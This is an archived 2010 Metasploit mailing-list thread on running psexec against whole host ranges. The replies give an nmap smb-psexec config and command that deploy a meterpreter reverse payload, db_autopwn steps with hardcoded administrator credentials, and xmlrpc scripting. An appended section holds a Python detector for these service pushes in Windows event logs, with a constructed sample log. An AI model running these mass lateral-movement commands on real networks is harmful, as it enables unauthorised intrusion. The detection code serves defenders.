Metasploit mailing list archives

Re: mods to psexec


From: Danilo Nascimento <danilo.nascimento.c () gmail com>
Date: Fri, 26 Mar 2010 08:44:06 -0300

I guess that you can also use the nmap smb-psexec script.
Basically you must generate a meterpreter rev exe via msfpayload,
create a smb-psexec config, set up a meterpreter rev payload on
multi/handler and then run nmap.

meterpreter.lua (smb-psexec config)
----------------------------------
module(... or "pwdump", package.seeall)

overrides = {}
modules = {}

local mod

mod = {}
mod.name             = "msf"
mod.program          = "<REPLACE WITH PAYLOAD PATH>"
table.insert(modules, mod)
----------------------------------

nmap command line:
nmap --script smb-psexec
--script-args=smbuser=USERNAME,smbpass=USERPASS,config=meterpreter.lua
-p445 IP_RANGE

I haven't tried it yet, so let us know if you try it.

[]'s Danilo Nascimento



On Fri, Mar 26, 2010 at 2:02 AM, Nelson <komseh () gmail com> wrote:
Here's how I do it:
setg SMBUser Administrator
setg SMBPass Password
setg SMBDomain DOMAIN (if needed)
db_driver postgresql
db_create msf:msf@localhost/msf
db_nmap -p445 192.168.1.1-254
db_autopwn -p -e -r -m psexec

On Thu, Mar 25, 2010 at 11:22 AM, Ulisses Castro <uss.thebug () gmail com> wrote:
On Thu, Mar 25, 2010 at 8:59 AM, Robin Wood <dninja () gmail com> wrote:

Hi
I've been asked by a colleague how easy it would be to modify psexec
so it would take multiple hosts rather than a single one. Each session
that came back would then be backgrounded or sent off to a
multi-handler.

Before I spend any time looking into doing this I wanted to check if
there was any better way to do it or if the functionality already
existed in other modules. If not then I'll have a look and see if I
can come up with some code.


Hi Robin!
You can use Metasploit with the xmlrpc plugin + any language that supports XML...
just:
msf > load xmlrpc Pass=123456 ServerType=Web
[*] XMLRPC Service: 127.0.0.1:55553
[*] XMLRPC Username: msf
[*] XMLRPC Password: 123456
[*] XMLRPC Server Type: Web
[*] XMLRPC Web URI: /RPC2
[*] Successfully loaded plugin: xmlrpc
msf >
And now you can automate whatever you want inside Metasploit, just write
some script/program that sends Metasploit commands via xmlrpc; a good example
is Nsploit.
Good post about this:
http://blog.happypacket.net/2009/12/psexec-scanner-via-metasploit-xmlrpc.html
Btw, you could try the new Ruby implementation in .RC files like HD said.
Cheers,
Ulisses


Robin
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
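All three approaches in this thread (nmap smb-psexec, db_autopwn with the psexec module, scripted psexec over xmlrpc) end up doing the same thing on every target: copy a service binary to the ADMIN$ share over SMB and start it as a new service. The following is an added defender-side example, not code from anyone in this thread or from Metasploit/nmap, showing how that pattern shows up in Windows event data and how to flag one source hitting a whole host range. The key=value log lines are constructed for the example (a rendering of Security event 5145, share object accessed, and System event 7045, service installed); the service allowlist, the thresholds and the name heuristic are assumptions to be tuned against a real baseline.

```python
"""Spot psexec-style service pushes across many hosts in Windows event data.

Added example. The key=value log format is a constructed rendering of
Windows events 5145 (share access) and 7045 (service installed); a real
deployment would read these from a SIEM or the event channels directly.
"""
import re
from collections import defaultdict
from datetime import datetime

KV = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Constructed sample (not real data): one account pushes randomly named
# services to three workstations within ten seconds; the rest is noise.
SAMPLE_LOG = r"""
2010-03-26T08:44:05 host=ws01 id=5145 share=\\*\ADMIN$ target=XcRbTqLw.exe mask=0x2 src=10.0.0.5 user=CORP\svc-admin
2010-03-26T08:44:06 host=ws01 id=7045 service=XcRbTqLw path="%SystemRoot%\XcRbTqLw.exe" account=LocalSystem
2010-03-26T08:44:09 host=ws02 id=5145 share=\\*\ADMIN$ target=QpLmZkRd.exe mask=0x2 src=10.0.0.5 user=CORP\svc-admin
2010-03-26T08:44:10 host=ws02 id=7045 service=QpLmZkRd path="%SystemRoot%\QpLmZkRd.exe" account=LocalSystem
2010-03-26T08:44:14 host=ws03 id=5145 share=\\*\ADMIN$ target=HnVsWtYb.exe mask=0x2 src=10.0.0.5 user=CORP\svc-admin
2010-03-26T08:44:15 host=ws03 id=7045 service=HnVsWtYb path="%SystemRoot%\HnVsWtYb.exe" account=LocalSystem
2010-03-26T08:50:00 host=ws04 id=7045 service=wuauserv path="%SystemRoot%\system32\svchost.exe -k netsvcs" account=LocalSystem
2010-03-26T08:51:00 host=ws05 id=5145 share=\\*\ADMIN$ target=Temp\patch.msi mask=0x2 src=10.0.0.9 user=CORP\sccm-push
2010-03-26T09:09:58 host=ws06 id=5145 share=\\*\ADMIN$ target=PSEXESVC.exe mask=0x2 src=10.0.0.7 user=CORP\helpdesk
2010-03-26T09:10:00 host=ws06 id=7045 service=PSEXESVC path="%SystemRoot%\PSEXESVC.exe" account=LocalSystem
"""

def parse_event(line):
    ts, rest = line.split(" ", 1)
    ev = {k: v.strip('"') for k, v in KV.findall(rest)}
    ev["ts"] = datetime.fromisoformat(ts)
    return ev

def parse_log(text):
    return [parse_event(l) for l in text.strip().splitlines() if l.strip()]

# Hypothetical baseline of known service names; build yours from clean hosts.
SERVICE_ALLOWLIST = {"wuauserv", "trustedinstaller", "winhttpautoproxysvc"}

def looks_random(name):
    """Heuristic: the Sysinternals service name PSEXESVC, or a mixed-case
    alphabetic blob like the random 8-letter names Metasploit's psexec uses."""
    if name.lower() in SERVICE_ALLOWLIST:
        return False
    if name.upper() == "PSEXESVC":
        return True
    if not name.isalpha() or len(name) < 6:
        return False
    interior = name[1:]
    return sum(c.isupper() for c in interior) >= 2 and any(c.islower() for c in interior)

def _basename(p):
    # Last path component, first whitespace token, lower-cased for comparison.
    return re.split(r"[\\/]", p.strip('"'))[-1].split(" ")[0].lower()

def detect_remote_installs(events, window_s=60):
    """Pair each 7045 with a write (AccessMask bit 0x2) of the same file name
    to ADMIN$ on the same host within window_s seconds: a binary dropped
    over SMB and then registered as a service."""
    writes = [e for e in events
              if e.get("id") == "5145"
              and e.get("share", "").upper().endswith("ADMIN$")
              and int(e.get("mask", "0"), 16) & 0x2]
    findings = []
    for ev in events:
        if ev.get("id") != "7045":
            continue
        exe = _basename(ev.get("path", ""))
        for w in writes:
            delta = (ev["ts"] - w["ts"]).total_seconds()
            if w["host"] == ev["host"] and _basename(w["target"]) == exe and 0 <= delta <= window_s:
                findings.append({"ts": ev["ts"], "host": ev["host"], "service": ev["service"],
                                 "src": w["src"], "user": w["user"],
                                 "random_name": looks_random(ev["service"])})
    return findings

def flag_mass_psexec(findings, min_hosts=3, window_s=600):
    """A source that installed services on min_hosts distinct hosts within
    window_s seconds is the 'psexec against a host range' pattern."""
    by_src = defaultdict(list)
    for f in findings:
        by_src[f["src"]].append(f)
    alerts = {}
    for src, fs in by_src.items():
        fs.sort(key=lambda f: f["ts"])
        for i, start in enumerate(fs):
            hosts = {f["host"] for f in fs[i:] if (f["ts"] - start["ts"]).total_seconds() <= window_s}
            if len(hosts) >= min_hosts:
                alerts[src] = sorted(hosts)
                break
    return alerts

if __name__ == "__main__":
    found = detect_remote_installs(parse_log(SAMPLE_LOG))
    for f in found:
        print(f"{f['ts']:%H:%M:%S} {f['host']}: service {f['service']} installed from {f['src']} as {f['user']}"
              + (" (random-looking name)" if f["random_name"] else ""))
    print("mass psexec sources:", flag_mass_psexec(found))
```

On the sample the pairing step yields four remote installs (three from 10.0.0.5, one PSEXESVC from a helpdesk address) and only 10.0.0.5 crosses the three-host threshold; the lone wuauserv 7045 on ws04 and the ADMIN$ write on ws05 that never becomes a service are both ignored. Event 5145 requires "Detailed File Share" auditing to be enabled, so the 7045 side on its own (with the name heuristic) is the fallback when that audit policy is off.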


